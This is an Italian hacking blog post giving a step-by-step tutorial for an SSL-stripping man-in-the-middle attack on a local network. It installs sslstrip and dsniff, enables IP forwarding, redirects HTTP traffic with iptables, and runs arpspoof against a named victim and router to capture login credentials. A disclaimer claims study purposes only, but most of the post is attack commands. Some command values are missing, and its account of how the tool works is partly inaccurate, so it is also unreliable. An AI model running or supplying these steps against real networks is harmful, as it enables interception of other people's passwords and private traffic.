DISCLAIMER!

Le informazioni (e i download, quindi tutti i file contenuti nel blog) da me divulgate sono da ritenersi a puro scopo informativo e di studio. Non mi assumo nessuna responsabilità riguardante l'uso improprio e/o illecito delle tecniche e dei programmi qui descritti e di tutti i danni a cose e persone e/o perdite di guadagni che ne possano derivare. Il blog non vuole istigare nessuno a delinquere o a commettere reati. Le tecniche qui descritte sono da utilizzare a proprio rischio e pericolo.

Traduci Il Blog In




Cerca in Xthreme Hacking!

Sniffare SSL


Secure Sockets Layer (SSL) è un protocollo crittografico che permette una comunicazione sicura e una integrità dei dati su reti TCP/IP come, ad esempio, internet. SSL cifra la comunicazione dalla sorgente alla destinazione (end-to-end) sul livello di trasporto.

Diverse versioni del protocollo sono ampiamente utilizzate in applicazioni come i browser, l'E-mail, la messaggistica istantanea e il Voice over IP.


Per poter sniffare i dati avremmo bisogno questa volta del tool SLLStrip.

Che è in grado di intercettare le connessioni (trasmissioni) SSL servendosi della tecnica dell’hijacking.

Citazione di: wikipedia
"Il termine hijacking indica una tecnica che consiste nel modificare opportunamente dei pacchetti dei protocolli TCP/IP al fine di dirottare i collegamenti ai propri siti e prenderne il controllo"


  • Funzionamento di SSLStrip

Il tool analizza continuamente la rete, captando il traffico SSL appena un host fa una richiesta di una pagina cifrata.
In questo caso il tool crea una copia della pagina richiesta dalla vittima. Quest’ultima verrà quindi dirottata sulla pagina clonata nella quale inserirà i propri dati di accesso, e cosi riceviamo i dati.

Il tool è scritto in Python.

Ora proveremo su Ubuntu.

Innanzitutto installiamo i software di cui ha bisogno il tool per fungere, digitiamo sul terminale:
 
Codice:
sudo apt-get install python python-twisted-web dsniff

Adesso scarichiamo il file contente SSLStrip cliccando qui sulla Scrivania. Digitamo quindi sul terminale:

Codice:
cd Scrivania

poi

Codice:
tar zxvf sslstrip-0.6.tar.gz

poi

Codice:
cd sslstrip-0.6
 
poi
 
Codice:
sudo python ./setup.py install

  • Attacco con SSLStrip

Mandiamo la scheda di rete in forwarding mode digitando:

Codice:
sudo su
echo "1" > /proc/sys/net/ipv4/ip_forward

Settiamo le iptables in maniera da reindirizzare il traffico HTTP verso SSLStrip digitando:
 
Codice:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 

Avviamo SSLStrip digitando:

Codice:
python ./sslstrip.py -l 

Alle precedenti righe andrà sostituito con il numero corrispondente alla porta da mettere in ascolto per l’attacco.

Abbiamo finito, ora ci basta avviare un ARP Spoof per obbligare la rete a reindirizzare il traffico verso l'host dell'attacker.
Per fare ciò apriamo un altro terminale lasciando aperto il precedente.

Digitiamo sul nuovo terminale:
 
Codice:
arpspoof -i  -t  

Al posto di va messo l’ip della vittima e al posto di l’indirizzo il del router.

A questo punto lo script inizierà a lavorare secondo il procedimento accennato sopra catturando i dati di accesso.

Nessun commento:

Posta un commento